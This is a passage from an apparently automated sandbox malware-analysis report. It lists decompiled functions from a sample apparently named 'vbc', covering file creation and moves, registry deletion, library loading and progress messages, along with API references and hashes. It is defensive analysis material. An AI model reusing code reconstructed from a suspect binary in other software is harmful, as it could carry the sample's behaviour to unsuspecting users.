					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040238E(void* __ebx) {
				short* _t6;
				long _t8;
				void* _t15;
				long _t19;
				void* _t22;
				void* _t23;

				_t15 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				if( *(_t23 - 0x18) != __ebx) {
					_t6 = E00402C53(0x22);
					_t18 =  *(_t23 - 0x18) & 0x00000002;
					__eflags =  *(_t23 - 0x18) & 0x00000002;
					_t8 = E00402C93(E00402D48( *((intOrPtr*)(_t23 - 0x24))), _t6, _t18); // executed
					_t19 = _t8;
					goto L4;
				} else {
					_t22 = E00402D5D(_t26, 2);
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t19 = RegDeleteValueW(_t22, E00402C53(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t19 != _t15) {
							goto L6;
						}
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x0040238e
0x0040238e
0x00402391
0x004023c0
0x004023c8
0x004023c8
0x004023d6
0x004023db
0x00000000
0x00402393
0x0040239a
0x0040239e
0x004028a1
0x004028a1
0x004023a4
0x004023b4
0x004023b6
0x004023dd
0x004023df
0x00000000
0x004023e5
0x004023df
0x0040239e
0x00402ade
0x00402aea

APIs

Part of subcall function 00402D5D: RegOpenKeyExW.KERNEL32 ref: 00402D85

RegDeleteValueW.ADVAPI32 ref: 004023AD
RegCloseKey.ADVAPI32(00000000), ref: 004023B6

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 808e079856c3e330f988604dba698f7ed65f16814c9e0450fdd811f5c471dab2
Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
Opcode Fuzzy Hash: 808e079856c3e330f988604dba698f7ed65f16814c9e0450fdd811f5c471dab2
Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: df02804171275602234b011b42ebcfacee08e398cb8d557c51063b0f7fc8f1ab
Instruction ID: 50398dcd8f08d813da2dc86a20fdec6a2780ea60cea6e306d4739c988c0027c9
Opcode Fuzzy Hash: df02804171275602234b011b42ebcfacee08e398cb8d557c51063b0f7fc8f1ab
Instruction Fuzzy Hash: 15E0D832A08204CFD724DBF4AE8446E73B0EB40318721457FE402F11D0CBF848419B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065EC(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E0040657C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004065f4
0x004065f7
0x004065fe
0x00406606
0x00406612
0x00000000
0x00406619
0x00406609
0x00406610
0x00000000
0x00406621
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
GetProcAddress.KERNEL32(00000000,?), ref: 00406619

Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
Part of subcall function 0040657C: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405deb
0x00405df8
0x00405e0d
0x00405e13

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405dc7
0x00405dcd
0x00405dd2
0x00405ddb
0x00405ddb
0x00405de4

APIs

GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DDB

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058BD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058c3
0x004058cb
0x00000000
0x004058d1
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
GetLastError.KERNEL32 ref: 004058D1

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D

Uniqueness

Uniqueness Score: -1.00%

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040167B() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402C53(0xffffffd0);
				_t16 = E00402C53(0xffffffdf);
				E00402C53(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x20)) == _t13 || E00406555(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E004060B3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x00401684
0x0040168d
0x0040168f
0x00401696
0x0040169e
0x004016aa
0x004028a1
0x004016be
0x004016c0
0x004016c5
0x00000000
0x004016c5
0x004016a0
0x004016a0
0x0040224b
0x0040224b
0x0040224b
0x00402ade
0x00402aea

APIs

MoveFileW.KERNEL32 ref: 00401696

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 8100d13256f8e2fae07f806f013d39e4d98fcf22fcf79b25ba5aed942edfd508
Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
Opcode Fuzzy Hash: 8100d13256f8e2fae07f806f013d39e4d98fcf22fcf79b25ba5aed942edfd508
Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F

Uniqueness

Uniqueness Score: -1.00%

Function 00402805 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402805(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t17;
				void* _t19;

				_t15 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t8 = E00402C31(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x50)) = _t15;
					_t10 = SetFilePointer(E00406172(_t14, _t17), _t8, _t12,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406159();
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402805
0x00402805
0x00402806
0x0040280e
0x00402813
0x00402814
0x00402823
0x0040282c
0x00402a7d
0x00402a7e
0x00402a81
0x00402a81
0x0040282c
0x00402ade
0x00402aea

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823

Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040230C(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C53(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C53(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C53(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C53(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040230c
0x0040230c
0x0040230e
0x00402312
0x00402315
0x0040231a
0x0040231f
0x00402328
0x00402328
0x0040232d
0x00402336
0x00402336
0x00402343
0x004015b4
0x004015b6
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

WritePrivateProfileStringW.KERNEL32 ref: 00402343

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402C53(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x0040286f
0x00402876
0x00402876
0x00402ade
0x00402aea

APIs

SearchPathW.KERNELBASE ref: 00401749

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: a1234d6e155c05a9ccd005b46901709963593e7fcb96b3c3db0381c47e23972b
Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
Opcode Fuzzy Hash: a1234d6e155c05a9ccd005b46901709963593e7fcb96b3c3db0381c47e23972b
Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D

Uniqueness

Uniqueness Score: -1.00%

Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00402D5D(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402C53(0x22);
				_t9 =  *0x40cdd8; // 0x18e8c8
				_t11 = RegOpenKeyExW(E00402D48( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402d71
0x00402d77
0x00402d85
0x00402d8d
0x00402d95

APIs

RegOpenKeyExW.KERNEL32 ref: 00402D85

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
